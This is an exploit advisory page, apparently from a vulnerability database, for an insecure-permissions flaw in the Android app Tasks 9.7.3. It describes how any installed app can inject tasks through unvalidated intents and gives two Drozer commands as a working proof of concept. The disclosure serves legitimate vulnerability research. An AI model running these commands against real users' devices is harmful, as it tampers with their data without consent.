Tasks 9.7.3 Insecure Permissions

2021.02.15
Credit: Lyhin's Lab
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Tasks 9.7.3 - Insecure Permissions # Date: 18th of July, 2020 # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/ # Vendor Homepage: https://tasks.org/ # Software Link: https://github.com/tasks/tasks # Version: 9.7.3 # Tested on: Android 9 Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. A malicious application has several ways of how to achieve that: 1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list. 2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list. We used the Drozer application to emulate malicious app activity. Please find the commands below. run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa" run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top